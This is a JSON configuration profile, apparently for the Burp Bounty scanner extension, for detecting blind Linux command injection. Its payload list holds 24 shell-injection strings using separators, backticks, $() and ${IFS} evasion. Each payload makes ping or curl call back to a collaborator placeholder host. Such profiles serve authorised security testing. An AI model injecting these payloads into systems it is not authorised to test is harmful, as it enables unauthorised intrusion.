[
  {
    "ProfileName": "Blind_RCE_Linux",
    "Name": "",
    "Enabled": true,
    "Scanner": 1,
    "Author": "@burpbounty",
    "Payloads": [
      " |ping -c 2 {BC}",
      " ||ping -c 2 {BC}",
      " ;ping -c 2 {BC}",
      " \u0026\u0026ping -c 2 {BC}",
      " \u0026ping -c 2 {BC}",
      " %0aping -c 2 {BC}",
      " `ping -c 2 {BC}`",
      " $(ping -c 2 {BC})",
      " \u0026ping${IFS}-c2${IFS}{BC}",
      " ;ping${IFS}-c2${IFS}{BC}",
      " |ping${IFS}-c2${IFS}{BC}",
      " ||ping${IFS}-c2${IFS}{BC}",
      " \u0026\u0026ping${IFS}-c2${IFS}{BC}",
      " %0aping${IFS}-c2${IFS}{BC}",
      " `ping${IFS}-c2${IFS}{BC}`",
      " $(ping${IFS}-c2${IFS}{BC})",
      " \u0026curl${IFS}{BC}",
      " ;curl${IFS}{BC}",
      " |curl${IFS}{BC}",
      " ||curl${IFS}{BC}",
      " \u0026\u0026curl${IFS}{BC}",
      " %0acurl${IFS}{BC}",
      " `curl${IFS}{BC}`",
      " $(curl${IFS}{BC})"
    ],
    "Encoder": [],
    "UrlEncode": true,
    "CharsToUrlEncode": "\u0026",
    "Grep": [],
    "Tags": [
      "RCE",
      "All"
    ],
    "PayloadResponse": false,
    "NotResponse": false,
    "TimeOut1": "",
    "TimeOut2": "",
    "isTime": false,
    "contentLength": "",
    "iscontentLength": false,
    "CaseSensitive": false,
    "ExcludeHTTP": false,
    "OnlyHTTP": false,
    "IsContentType": false,
    "ContentType": "",
    "HttpResponseCode": "",
    "NegativeCT": false,
    "IsResponseCode": false,
    "ResponseCode": "",
    "NegativeRC": false,
    "urlextension": "",
    "isurlextension": false,
    "NegativeUrlExtension": false,
    "MatchType": 1,
    "Scope": 0,
    "RedirType": 0,
    "MaxRedir": 0,
    "payloadPosition": 2,
    "payloadsFile": "",
    "grepsFile": "",
    "IssueName": "Blind_RCE_Linux",
    "IssueSeverity": "High",
    "IssueConfidence": "Certain",
    "IssueDetail": "",
    "RemediationDetail": "",
    "IssueBackground": "",
    "RemediationBackground": "",
    "Header": [],
    "VariationAttributes": [],
    "InsertionPointType": [
      65,
      32,
      36,
      1,
      2,
      6,
      5,
      35,
      34,
      64,
      0,
      3,
      4
    ],
    "Scanas": false,
    "Scantype": 0,
    "pathDiscovery": false
  }
]